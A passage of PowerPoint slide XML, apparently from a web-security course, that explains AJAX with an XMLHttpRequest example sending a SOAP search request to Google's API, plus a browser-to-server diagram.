              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>  if (xmlhttp.readyState==4) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>   alert(xmlhttp.responseText)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> xmlhttp.setRequestHeader("Man", "POST http://api.google.com/search/beta2 HTTP/1.1")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> xmlhttp.setRequestHeader("MessageType", "CALL")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> xmlhttp.setRequestHeader("Content-Type", "text/xml")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167940" name="TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6172200" y="1868488"/>
            <a:ext cx="2514600" cy="64135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800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>The xmlhttprequest object is initialized</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167941" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="2819400"/>
            <a:ext cx="2514600" cy="915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800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Set the function to call when the readystate changes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="167942" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4876800" y="3048000"/>
            <a:ext cx="1295400" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167943" name="Right Brace 22"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="4343400"/>
            <a:ext cx="533400" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 30069"/>
              <a:gd name="adj2" fmla="val 50000"/>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pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167944" name="TextBox 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="4876800"/>
            <a:ext cx="2514600" cy="915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800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Build the POST </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Request here (continued on next slide)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="167945" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3886200" y="2057400"/>
            <a:ext cx="2286000" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="167946" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="3733800" y="3429000"/>
            <a:ext cx="2438400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167947" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="3773488"/>
            <a:ext cx="2514600" cy="915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800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>readyState 4 means that the server response is complete</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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="152400"/>
            <a:ext cx="3657600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest Diagram</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335878" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="304800" y="152400"/>
            <a:ext cx="5105400" cy="6248400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xmlhttp.send("&lt;?xml version='1.0' encoding='UTF-8'?&gt;"+"\n\n"+"&lt;SOAP-ENV:Envelope"+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xmlns:xsd="http://www.w3.org/1999/XMLSchema"&gt;'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      '&lt;SOAP-ENV:Body&gt;&lt;ns1:doGoogleSearch'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xmlns:ns1="urn:GoogleSearch"'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt;'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      '&lt;key xsi:type="xsd:string"&gt;GOOGLEKEY&lt;/key&gt; &lt;q'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xsi:type="xsd:string"&gt;'+search+'&lt;/q&gt; &lt;start'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xsi:type="xsd:int"&gt;0&lt;/start&gt; &lt;maxResults'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xsi:type="xsd:int"&gt;10&lt;/maxResults&gt; &lt;filter'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xsi:type="xsd:boolean"&gt;true&lt;/filter&gt; &lt;restrict'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xsi:type="xsd:string"&gt;&lt;/restrict&gt; &lt;safeSearch'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xsi:type="xsd:boolean"&gt;false&lt;/safeSearch&gt; &lt;lr'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xsi:type="xsd:string"&gt;&lt;/lr&gt; &lt;ie'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xsi:type="xsd:string"&gt;latin1&lt;/ie&gt; &lt;oe'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      ' xsi:type="xsd:string"&gt;latin1&lt;/oe&gt;'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      '&lt;/ns1:doGoogleSearch&gt;'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    '&lt;/SOAP-ENV:Body&gt;&lt;/SOAP-ENV:Envelope&gt;')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168964" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="3657600"/>
            <a:ext cx="1524000" cy="1187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200" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>XMLHTTPRequest object sends a POST request to Google to retrieve the search results for the string "Security 542".</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168965" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5946775" y="5486400"/>
            <a:ext cx="792163" cy="493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Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="168966" name="Straight Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6553200" y="3733800"/>
            <a:ext cx="1905000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168967" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5648325" y="2819400"/>
            <a:ext cx="1020763" cy="265113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="168968" name="Straight Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="5638800" y="3581400"/>
            <a:ext cx="1828800" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168969" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="3810000"/>
            <a:ext cx="9906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200" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Web page returns containing AJAX code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168970" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="7294563" y="3810000"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168971" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6324600" y="3886200"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168972" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7015163" y="2819400"/>
            <a:ext cx="1590675" cy="265113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Google Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="168973"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1905000"/>
            <a:ext cx="609600" cy="871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8974"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1905000"/>
            <a:ext cx="609600" cy="871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8975"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00" y="5029200"/>
            <a:ext cx="609600" cy="871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1041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
